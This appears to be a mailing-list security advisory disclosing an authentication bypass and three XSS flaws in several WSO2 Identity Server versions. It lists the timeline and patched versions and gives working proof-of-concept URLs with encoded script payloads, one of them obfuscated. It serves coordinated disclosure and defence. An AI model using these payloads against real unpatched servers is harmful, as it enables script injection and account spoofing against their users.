Hi,
WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.
Timeline:
09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure
Vulnerable versions:
IS 4.5.0
IS 4.6.0
IS 5.0.0
Fixed versions:
IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1
Vulnerabilities details:
1) Identity spoofing/authentication bypass. Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to _any_ identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.
2) XSS A - HTML injection
https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e
3) XSS B - HTML injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL
4) XSS C - JavaScript injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL
regards
--
Bartlomiej Balcerek
WCSS CSIRT
Wroclaw Centre for Networking and Supercomputing
Wroclaw University of Technology, Poland
phone: +48 (71) 320-20-79 mail: bartol@pwr.edu.pl